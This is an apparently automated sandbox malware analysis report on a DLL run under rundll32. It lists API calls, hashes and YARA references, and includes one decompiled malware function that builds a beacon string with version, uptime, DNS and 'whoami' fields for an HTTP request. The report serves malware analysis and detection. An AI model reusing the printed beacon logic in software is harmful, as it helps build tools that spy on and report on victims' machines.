                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 04F63A8B
                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04F63AB8
                            • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 04F63AD2
                            • _allmul.NTDLL(0000003C,00000000,FF676980,000000FF), ref: 04F63B1A
                            • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,0000003C,00000000,FF676980,000000FF), ref: 04F63B34
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04F63B4A
                            • ReleaseMutex.KERNEL32(?), ref: 04F63B67
                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 04F63B78
                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 04F63B87
                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04F63BBB
                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 04F63BD5
                            • SwitchToThread.KERNEL32 ref: 04F63BD7
                            • ReleaseMutex.KERNEL32(?), ref: 04F63BE1
                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 04F63C1F
                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 04F63C2A
                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04F63C4D
                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 04F63C67
                            • SwitchToThread.KERNEL32 ref: 04F63C69
                            • ReleaseMutex.KERNEL32(?), ref: 04F63C73
                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 04F63C88
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 04F63CEA
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 04F63CF6
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 04F63D02
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 04F63D0E
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 04F63D1A
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 04F63D26
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 04F63D32
                            • RtlExitUserThread.NTDLL(00000000,?,?,?,?,?,?,?), ref: 04F63D41
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Wait$CloseHandleObjectSingle$TimerWaitable$MultipleObjects$HeapMutexRelease_allmul$FreeThread$CreateErrorEventLastSwitchTime$AllocateExitFileOpenResetSystemTrimUser
                            • String ID:
                            • API String ID: 2369282788-0
                            • Opcode ID: d073a536c84680790f2ff61d96eb401f76d5561b6ae06aa20f9fc92ca801846a
                            • Instruction ID: 28ff31550eb43eb2b0aee30ac3fed6fc9a34d4da32691b2f97bab673fb810ede
                            • Opcode Fuzzy Hash: d073a536c84680790f2ff61d96eb401f76d5561b6ae06aa20f9fc92ca801846a
                            • Instruction Fuzzy Hash: C8E192B1804309AFD711AF64EC80D7EBBE9FB44358F044A2EF996961A0D775EC068F52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7F1C4 Relevance: 43.8, APIs: 29, Instructions: 271memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • RtlAllocateHeap.NTDLL ref: 04F7F1E5
                            • GetTickCount.KERNEL32 ref: 04F7F1FF
                            • wsprintfA.USER32 ref: 04F7F252
                            • QueryPerformanceFrequency.KERNEL32(?), ref: 04F7F25E
                            • QueryPerformanceCounter.KERNEL32(?), ref: 04F7F269
                            • _aulldiv.NTDLL(?,?,?,?), ref: 04F7F27F
                            • wsprintfA.USER32 ref: 04F7F295
                            • wsprintfA.USER32 ref: 04F7F2AF
                            • wsprintfA.USER32 ref: 04F7F2D4
                            • HeapFree.KERNEL32(00000000,?), ref: 04F7F2E7
                            • wsprintfA.USER32 ref: 04F7F30B
                            • HeapFree.KERNEL32(00000000,?), ref: 04F7F31E
                            • wsprintfA.USER32 ref: 04F7F358
                            • wsprintfA.USER32 ref: 04F7F37C
                            • lstrcat.KERNEL32(?,?), ref: 04F7F3B4
                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04F7F3CE
                            • GetTickCount.KERNEL32 ref: 04F7F3DE
                            • RtlEnterCriticalSection.NTDLL(0631C2D0), ref: 04F7F3F2
                            • RtlLeaveCriticalSection.NTDLL(0631C2D0), ref: 04F7F410
                            • StrTrimA.SHLWAPI(00000000,04F853E8,00000000,0631C310), ref: 04F7F449
                            • lstrcpy.KERNEL32(00000000,?), ref: 04F7F46B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 04F7F472
                            • lstrcat.KERNEL32(00000000,?), ref: 04F7F479
                            • lstrcat.KERNEL32(00000000,?), ref: 04F7F480
                            • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 04F7F4FA
                            • HeapFree.KERNEL32(00000000,?,00000000), ref: 04F7F50C
                            • HeapFree.KERNEL32(00000000,00000000,00000000,0631C310), ref: 04F7F51B
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F7F52D
                            • HeapFree.KERNEL32(00000000,?), ref: 04F7F53F
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Freewsprintf$lstrcat$AllocateCountCriticalPerformanceQuerySectionTicklstrcpy$CounterEnterFrequencyLeaveTrim_aulldiv
                            • String ID:
                            • API String ID: 4198993012-0
                            • Opcode ID: 99f7491efd0cb2ba077320abc0010db082d2fdcbd2f39236918144053c339a5a
                            • Instruction ID: effc4ec62c2373b6f5e05f21fa015f4718e56a926721f2a648cea38670e68251
                            • Opcode Fuzzy Hash: 99f7491efd0cb2ba077320abc0010db082d2fdcbd2f39236918144053c339a5a
                            • Instruction Fuzzy Hash: 8EA13D7190020AAFDB01DF68FC84E6A3BE9EF48314F04041EF559DA261D779EC5ADBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F77AEF Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 389memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(?,00000000,?,?), ref: 04F77B51
                            • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 04F77BED
                            • lstrcpyn.KERNEL32(00000000,?,?), ref: 04F77C02
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F77C1D
                            • StrChrA.SHLWAPI(?,00000020,00000000,?,?,?), ref: 04F77D04
                            • StrChrA.SHLWAPI(00000001,00000020), ref: 04F77D15
                            • lstrlen.KERNEL32(00000000), ref: 04F77D29
                            • memmove.NTDLL(?,?,00000001), ref: 04F77D39
                            • lstrlen.KERNEL32(?,00000000,?,?,?), ref: 04F77D65
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F77D8B
                            • memcpy.NTDLL(00000000,?,?), ref: 04F77D9F
                            • memcpy.NTDLL(?,?,?), ref: 04F77DBF
                            • HeapFree.KERNEL32(00000000,?), ref: 04F77DFB
                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04F77EC1
                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 04F77F09
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
                            • String ID: GET $GET $OPTI$OPTI$POST$PUT
                            • API String ID: 3227826163-647159250
                            • Opcode ID: 4cc0b63ed435cba9958c22993af578feebee780847035abbe3a8ce9d458f966d
                            • Instruction ID: 922b4c925bd8f0c6eba03bd1713d6006b7e2c061ce982a24efe76b9fbfc3c3eb
                            • Opcode Fuzzy Hash: 4cc0b63ed435cba9958c22993af578feebee780847035abbe3a8ce9d458f966d
                            • Instruction Fuzzy Hash: 23E14B71E10209EFDB15EFA8DC84AAABBB9FF04300F14855AE9159B250D738FD52DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6E627 Relevance: 36.3, APIs: 24, Instructions: 288memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • RtlAllocateHeap.NTDLL ref: 04F6E65B
                            • wsprintfA.USER32 ref: 04F6E6C5
                            • wsprintfA.USER32 ref: 04F6E70B
                            • wsprintfA.USER32 ref: 04F6E72C
                            • lstrcat.KERNEL32(00000000,?), ref: 04F6E763
                            • wsprintfA.USER32 ref: 04F6E784
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F6E79E
                            • wsprintfA.USER32 ref: 04F6E7C5
                            • HeapFree.KERNEL32(00000000,?), ref: 04F6E7DA
                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04F6E7F4
                            • RtlEnterCriticalSection.NTDLL(0631C2D0), ref: 04F6E815
                            • RtlLeaveCriticalSection.NTDLL(0631C2D0), ref: 04F6E82F
                              • Part of subcall function 04F7EA15: lstrlen.KERNEL32(00000000,761F81D0,?,761B5520,7749EEF0,?,00000000,04F6E842,00000000,0631C310), ref: 04F7EA40
                              • Part of subcall function 04F7EA15: lstrlen.KERNEL32(?,?,00000000,04F6E842,00000000,0631C310), ref: 04F7EA48
                              • Part of subcall function 04F7EA15: strcpy.NTDLL ref: 04F7EA5F
                              • Part of subcall function 04F7EA15: lstrcat.KERNEL32(00000000,?), ref: 04F7EA6A
                              • Part of subcall function 04F7EA15: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,00000000,04F6E842,00000000,0631C310), ref: 04F7EA87
                            • StrTrimA.SHLWAPI(00000000,04F853E8,00000000,0631C310), ref: 04F6E864
                              • Part of subcall function 04F68DC7: lstrlen.KERNEL32(06318560,761B5520,761F81D0,7749EEF0,04F6E873,?), ref: 04F68DD7
                              • Part of subcall function 04F68DC7: lstrlen.KERNEL32(?), ref: 04F68DDF
                              • Part of subcall function 04F68DC7: lstrcpy.KERNEL32(00000000,06318560), ref: 04F68DF3
                              • Part of subcall function 04F68DC7: lstrcat.KERNEL32(00000000,?), ref: 04F68DFE
                            • lstrcpy.KERNEL32(?,?), ref: 04F6E88D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 04F6E897
                            • lstrcat.KERNEL32(00000000,?), ref: 04F6E8A2
                            • lstrcat.KERNEL32(00000000,?), ref: 04F6E8A9
                            • RtlEnterCriticalSection.NTDLL(0631C2D0), ref: 04F6E8B4
                            • RtlLeaveCriticalSection.NTDLL(0631C2D0), ref: 04F6E8D0
                              • Part of subcall function 04F67DF5: memcpy.NTDLL(?,?,00000010,?,?,?,?,?,?,?,?,?,?,04F75583,00000000,00000000), ref: 04F67E46
                              • Part of subcall function 04F67DF5: memcpy.NTDLL(00000000,00000000,?,0000011F), ref: 04F67ED9
                            • HeapFree.KERNEL32(00000000,?,00000001,0631C310,?,?,?), ref: 04F6E997
                            • HeapFree.KERNEL32(00000000,?,?), ref: 04F6E9AF
                            • HeapFree.KERNEL32(00000000,?,00000000,0631C310), ref: 04F6E9BD
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F6E9CB
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F6E9D6
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Free$lstrcatwsprintf$CriticalSectionlstrlen$lstrcpy$AllocateEnterLeaveTrimmemcpy$strcpy
                            • String ID:
                            • API String ID: 4032678529-0
                            • Opcode ID: e6bf4fb794470bc34439f5fe2950d99257e26879d4e64acef51ea10aa8d8d9e4
                            • Instruction ID: b6882578bbdb382206fb80588ee55d9015393d3a86200d9f8f69a66f63abab39
                            • Opcode Fuzzy Hash: e6bf4fb794470bc34439f5fe2950d99257e26879d4e64acef51ea10aa8d8d9e4
                            • Instruction Fuzzy Hash: 65B13672A04209AFDB01DF68EC84E2A7BE9EF88304F04441EF559DB261D77AEC16DB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A1300E Relevance: 36.3, APIs: 24, Instructions: 266memorystringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 75%
                            			E04A1300E(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
				intOrPtr _v4;
				signed int _v8;
				int* _v12;
				char* _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				void* __ebx;
				void* __edi;
				long _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				void* _t74;
				intOrPtr _t75;
				int _t78;
				intOrPtr _t79;
				int _t82;
				intOrPtr _t83;
				intOrPtr _t84;
				void* _t86;
				void* _t89;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr* _t99;
				int* _t105;
				int* _t115;
				char** _t117;
				char* _t118;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr _t132;
				intOrPtr _t136;
				int _t139;
				intOrPtr _t141;
				int _t144;
				void* _t145;
				intOrPtr _t159;
				void* _t161;
				int _t162;
				void* _t163;
				void* _t164;
				long _t165;
				intOrPtr* _t166;
				intOrPtr* _t167;
				intOrPtr _t168;
				intOrPtr* _t171;
				char** _t174;
				char** _t176;
				char** _t177;
				void* _t182;

				_t66 = __eax;
				_t174 =  &_v16;
				_t145 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t66 = GetTickCount();
				}
				_t67 =  *0x4a1a018; // 0x59144415
				asm("bswap eax");
				_t68 =  *0x4a1a014; // 0x3a87c8cd
				asm("bswap eax");
				_t69 =  *0x4a1a010; // 0xd8d2f808
				asm("bswap eax");
				_t70 =  *0x4a1a00c; // 0xeec43f25
				asm("bswap eax");
				_t71 =  *0x4a1a348; // 0xb1d5a8
				_t3 = _t71 + 0x4a1b62b; // 0x74666f73
				_t162 = wsprintfA(_t145, _t3, 3, 0x3d175, _t70, _t69, _t68, _t67,  *0x4a1a02c,  *0x4a1a004, _t66);
				_t74 = E04A16927();
				_t75 =  *0x4a1a348; // 0xb1d5a8
				_t4 = _t75 + 0x4a1b66b; // 0x74707526
				_t78 = wsprintfA(_t162 + _t145, _t4, _t74);
				_t176 =  &(_t174[0xe]);
				_t163 = _t162 + _t78;
				if(_a24 != 0) {
					_t141 =  *0x4a1a348; // 0xb1d5a8
					_t8 = _t141 + 0x4a1b676; // 0x732526
					_t144 = wsprintfA(_t163 + _t145, _t8, _a24);
					_t176 =  &(_t176[3]);
					_t163 = _t163 + _t144;
				}
				_t79 =  *0x4a1a348; // 0xb1d5a8
				_t10 = _t79 + 0x4a1b78e; // 0x5538d36
				_t182 = _a20 - _t10;
				_t12 = _t79 + 0x4a1b2de; // 0x74636126
				_t157 = 0 | _t182 == 0x00000000;
				_t82 = wsprintfA(_t163 + _t145, _t12, _t182 == 0);
				_t177 =  &(_t176[3]);
				_t164 = _t163 + _t82;
				_t83 = E04A122D7(_t10);
				_a32 = _t83;
				if(_t83 != 0) {
					_t136 =  *0x4a1a348; // 0xb1d5a8
					_t17 = _t136 + 0x4a1b8d0; // 0x736e6426
					_t139 = wsprintfA(_t164 + _t145, _t17, _t83);
					_t177 =  &(_t177[3]);
					_t164 = _t164 + _t139;
					HeapFree( *0x4a1a2d8, 0, _a40);
				}
				_t84 = E04A12A11();
				_a32 = _t84;
				if(_t84 != 0) {
					_t132 =  *0x4a1a348; // 0xb1d5a8
					_t21 = _t132 + 0x4a1b8d8; // 0x6f687726
					wsprintfA(_t164 + _t145, _t21, _t84);
					_t177 =  &(_t177[3]);
					HeapFree( *0x4a1a2d8, 0, _a40);
				}
				_t159 =  *0x4a1a3cc; // 0x55395b0
				_t86 = E04A12509(0x4a1a00a, _t159 + 4);
				_t165 = 0;
				_a16 = _t86;
				if(_t86 == 0) {
					L28:
					HeapFree( *0x4a1a2d8, _t165, _t145);
					return _a44;
				} else {
					_t89 = RtlAllocateHeap( *0x4a1a2d8, 0, 0x800);
					_a24 = _t89;
					if(_t89 == 0) {
						L27:
						HeapFree( *0x4a1a2d8, _t165, _a8);
						goto L28;
					}
					E04A11BE9(GetTickCount());
					_t93 =  *0x4a1a3cc; // 0x55395b0
					__imp__(_t93 + 0x40);
					asm("lock xadd [eax], ecx");
					_t97 =  *0x4a1a3cc; // 0x55395b0
					__imp__(_t97 + 0x40);
					_t99 =  *0x4a1a3cc; // 0x55395b0
					_t161 = E04A11D33(1, _t157, _t145,  *_t99);
					asm("lock xadd [eax], ecx");
					if(_t161 == 0) {
						L26:
						HeapFree( *0x4a1a2d8, _t165, _a16);
						goto L27;
					}
					StrTrimA(_t161, 0x4a1928c);
					_push(_t161);
					_t105 = E04A1393C();
					_v12 = _t105;
					if(_t105 == 0) {
						L25:
						HeapFree( *0x4a1a2d8, _t165, _t161);
						goto L26;
					}
					_t166 = __imp__;
					 *_t166(_t161, _a8);
					 *_t166(_a4, _v12);
					_t167 = __imp__;
					 *_t167(_v4, _v24);
					_t168 = E04A161FC( *_t167(_v12, _t161), _v20);
					_v36 = _t168;
					if(_t168 == 0) {
						_v8 = 8;
						L23:
						E04A1561E();
						L24:
						HeapFree( *0x4a1a2d8, 0, _v40);
						_t165 = 0;
						goto L25;
					}
					_t115 = E04A110B7(_t145, 0xffffffffffffffff, _t161,  &_v24);
					_v12 = _t115;
					if(_t115 == 0) {
						_t171 = _v24;
						_v20 = E04A15B9D(_t171, _t168, _v16, _v12);
						_t123 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
						_t125 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t125 + 8))(_t125);
						_t127 =  *((intOrPtr*)(_t171 + 4));
						 *((intOrPtr*)( *_t127 + 8))(_t127);
						_t129 =  *_t171;
						 *((intOrPtr*)( *_t129 + 8))(_t129);
						E04A16C2C(_t171);
					}
					if(_v8 != 0x10d2) {
						L18:
						if(_v8 == 0) {
							_t117 = _v16;
							if(_t117 != 0) {
								_t118 =  *_t117;
								_t169 =  *_v12;
								_v16 = _t118;
								wcstombs(_t118, _t118,  *_v12);
								 *_v24 = E04A13C22(_v16, _v16, _t169 >> 1);
							}
						}
						goto L21;
					} else {
						if(_v16 != 0) {
							L21:
							E04A16C2C(_v32);
							if(_v12 == 0 || _v8 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_v8 = _v8 & 0x00000000;
						goto L18;
					}
				}
			}




























































                            0x04a1300e
                            0x04a1300e
                            0x04a13012
                            0x04a13019
                            0x04a13023
                            0x04a13025
                            0x04a13025
                            0x04a13032
                            0x04a1303d
                            0x04a13040
                            0x04a1304b
                            0x04a1304e
                            0x04a13053
                            0x04a13056
                            0x04a1305b
                            0x04a1305e
                            0x04a1306a
                            0x04a13077
                            0x04a13079
                            0x04a1307f
                            0x04a13084
                            0x04a1308f
                            0x04a13091
                            0x04a13094
                            0x04a1309b
                            0x04a1309d
                            0x04a130a6
                            0x04a130b1
                            0x04a130b3
                            0x04a130b6
                            0x04a130b6
                            0x04a130b8
                            0x04a130bd
                            0x04a130c5
                            0x04a130c9
                            0x04a130cf
                            0x04a130d8
                            0x04a130da
                            0x04a130dd
                            0x04a130df
                            0x04a130ea
                            0x04a130f0
                            0x04a130f3
                            0x04a130f8
                            0x04a13103
                            0x04a13105
                            0x04a1310c
                            0x04a13116
                            0x04a13116
                            0x04a13118
                            0x04a1311d
                            0x04a13123
                            0x04a13126
                            0x04a1312b
                            0x04a13135
                            0x04a13137
                            0x04a13146
                            0x04a13146
                            0x04a13148
                            0x04a13156
                            0x04a1315b
                            0x04a1315d
                            0x04a13163
                            0x04a13343
                            0x04a1334b
                            0x04a13358
                            0x04a13169
                            0x04a13175
                            0x04a1317b
                            0x04a13181
                            0x04a13336
                            0x04a13341
                            0x00000000
                            0x04a13341
                            0x04a1318d
                            0x04a13192
                            0x04a1319b
                            0x04a131ac
                            0x04a131b0
                            0x04a131b9
                            0x04a131bf
                            0x04a131cc
                            0x04a131d9
                            0x04a131df
                            0x04a13329
                            0x04a13334
                            0x00000000
                            0x04a13334
                            0x04a131eb
                            0x04a131f1
                            0x04a131f2
                            0x04a131f7
                            0x04a131fd
                            0x04a1331f
                            0x04a13327
                            0x00000000
                            0x04a13327
                            0x04a13207
                            0x04a1320e
                            0x04a13218
                            0x04a1321e
                            0x04a13228
                            0x04a1323a
                            0x04a1323c
                            0x04a13242
                            0x04a1335b
                            0x04a1330a
                            0x04a1330a
                            0x04a1330f
                            0x04a1331b
                            0x04a1331d
                            0x00000000
                            0x04a1331d
                            0x04a1324d
                            0x04a13252
                            0x04a13258
                            0x04a13263
                            0x04a1326e
                            0x04a13272
                            0x04a13278
                            0x04a1327e
                            0x04a13284
                            0x04a13287
                            0x04a1328d
                            0x04a13290
                            0x04a13295
                            0x04a13299
                            0x04a13299
                            0x04a132a6
                            0x04a132b4
                            0x04a132b9
                            0x04a132bb
                            0x04a132c1
                            0x04a132c7
                            0x04a132c9
                            0x04a132ce
                            0x04a132d2
                            0x04a132ee
                            0x04a132ee
                            0x04a132c1
                            0x00000000
                            0x04a132a8
                            0x04a132ad
                            0x04a132f0
                            0x04a132f4
                            0x04a132fe
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x04a132fe
                            0x04a132af
                            0x00000000
                            0x04a132af
                            0x04a132a6

                            APIs
                            • GetTickCount.KERNEL32 ref: 04A13025
                            • wsprintfA.USER32 ref: 04A13072
                            • wsprintfA.USER32 ref: 04A1308F
                            • wsprintfA.USER32 ref: 04A130B1
                            • wsprintfA.USER32 ref: 04A130D8
                            • wsprintfA.USER32 ref: 04A13103
                            • HeapFree.KERNEL32(00000000,?), ref: 04A13116
                            • wsprintfA.USER32 ref: 04A13135
                            • HeapFree.KERNEL32(00000000,?), ref: 04A13146
                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04A13175
                            • GetTickCount.KERNEL32 ref: 04A13187
                            • RtlEnterCriticalSection.NTDLL(05539570), ref: 04A1319B
                            • RtlLeaveCriticalSection.NTDLL(05539570), ref: 04A131B9
                              • Part of subcall function 04A11D33: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,746BC740,04A158D7,00000000,055395B0), ref: 04A11D5E
                              • Part of subcall function 04A11D33: lstrlen.KERNEL32(00000000,?,746BC740,04A158D7,00000000,055395B0), ref: 04A11D66
                              • Part of subcall function 04A11D33: strcpy.NTDLL ref: 04A11D7D
                              • Part of subcall function 04A11D33: lstrcat.KERNEL32(00000000,00000000), ref: 04A11D88
                              • Part of subcall function 04A11D33: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,04A158D7,?,746BC740,04A158D7,00000000,055395B0), ref: 04A11DA5
                            • StrTrimA.SHLWAPI(00000000,04A1928C,?,055395B0), ref: 04A131EB
                              • Part of subcall function 04A1393C: lstrlen.KERNEL32(05539B68,00000000,00000000,00000000,04A15902,00000000), ref: 04A1394C
                              • Part of subcall function 04A1393C: lstrlen.KERNEL32(?), ref: 04A13954
                              • Part of subcall function 04A1393C: lstrcpy.KERNEL32(00000000,05539B68), ref: 04A13968
                              • Part of subcall function 04A1393C: lstrcat.KERNEL32(00000000,?), ref: 04A13973
                            • lstrcpy.KERNEL32(00000000,?), ref: 04A1320E
                            • lstrcpy.KERNEL32(?,?), ref: 04A13218
                            • lstrcat.KERNEL32(?,?), ref: 04A13228
                            • lstrcat.KERNEL32(?,00000000), ref: 04A1322F
                              • Part of subcall function 04A161FC: lstrlen.KERNEL32(?,00000000,05539D70,00000000,04A139E8,05539F93,69B25F44,?,?,?,?,69B25F44,00000005,04A1A00C,4D283A53,?), ref: 04A16203
                              • Part of subcall function 04A161FC: mbstowcs.NTDLL ref: 04A1622C
                              • Part of subcall function 04A161FC: memset.NTDLL ref: 04A1623E
                            • wcstombs.NTDLL ref: 04A132D2
                              • Part of subcall function 04A15B9D: SysAllocString.OLEAUT32(?), ref: 04A15BD8
                              • Part of subcall function 04A16C2C: RtlFreeHeap.NTDLL(00000000,00000000,04A15E1D,00000000,?,?,00000000), ref: 04A16C38
                            • HeapFree.KERNEL32(00000000,?), ref: 04A1331B
                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04A13327
                            • HeapFree.KERNEL32(00000000,?,?,055395B0), ref: 04A13334
                            • HeapFree.KERNEL32(00000000,?), ref: 04A13341
                            • HeapFree.KERNEL32(00000000,?), ref: 04A1334B
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Heap$Free$wsprintf$lstrlen$lstrcat$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                            • String ID:
                            • API String ID: 967369141-0
                            • Opcode ID: 9db71da7cb605330f3a19e13813be297f0087b3dc40b0bb5a985f060945a7bae
                            • Instruction ID: fd1b24f0473f27093aea393e8dfa2e31de488f2d3dbe2fecb5dd93bfb5c53ba2
                            • Opcode Fuzzy Hash: 9db71da7cb605330f3a19e13813be297f0087b3dc40b0bb5a985f060945a7bae
                            • Instruction Fuzzy Hash: A6A18B71502300AFEB11AF64DC48E9A7BE8EF98754F050928F889D7230DB39EC46DB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7CEB7 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 219memoryfilestringCOMMON
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32 ref: 04F7CED3
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F7CEEF
                            • GetLastError.KERNEL32 ref: 04F7CF3E
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F7CF54
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F7CF68
                            • GetLastError.KERNEL32 ref: 04F7CF82
                            • GetLastError.KERNEL32 ref: 04F7CFB5
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F7CFD3
                            • lstrlenW.KERNEL32(00000000,?), ref: 04F7CFFF
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F7D014
                            • DeleteFileW.KERNEL32(?,00000000,?,?,00000000,00000000,00000001), ref: 04F7D0E8
                            • HeapFree.KERNEL32(00000000,?), ref: 04F7D0F7
                            • WaitForSingleObject.KERNEL32(00000000), ref: 04F7D10C
                            • HeapFree.KERNEL32(00000000,00000000), ref: 04F7D11F
                            • HeapFree.KERNEL32(00000000,?), ref: 04F7D131
                            • RtlExitUserThread.NTDLL(?,?), ref: 04F7D146
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Free$ErrorLast$Allocate$DeleteExitFileObjectSingleThreadUserWaitlstrlen
                            • String ID:
                            • API String ID: 3853681310-3916222277
                            • Opcode ID: 29a5a17400a509c25b4f93f45331d21f1e17ffbd73db186d7b9c4eac91757ff5
                            • Instruction ID: a40f6f8c3f479a9de2340afcd77eb296e00e90916f3f7ebbcb06e7265e7fd0f6
                            • Opcode Fuzzy Hash: 29a5a17400a509c25b4f93f45331d21f1e17ffbd73db186d7b9c4eac91757ff5
                            • Instruction Fuzzy Hash: 9F81E77190024EBFDB119FA4EC84EBE7BB8EB09344F04446AF505AB250D779AD46AB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F62C62 Relevance: 27.3, APIs: 18, Instructions: 275memorystringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F81ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?), ref: 04F81F02
                              • Part of subcall function 04F81ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 04F81F16
                              • Part of subcall function 04F81ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?), ref: 04F81F30
                              • Part of subcall function 04F81ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,04F62C89,?,?,?), ref: 04F81F5A
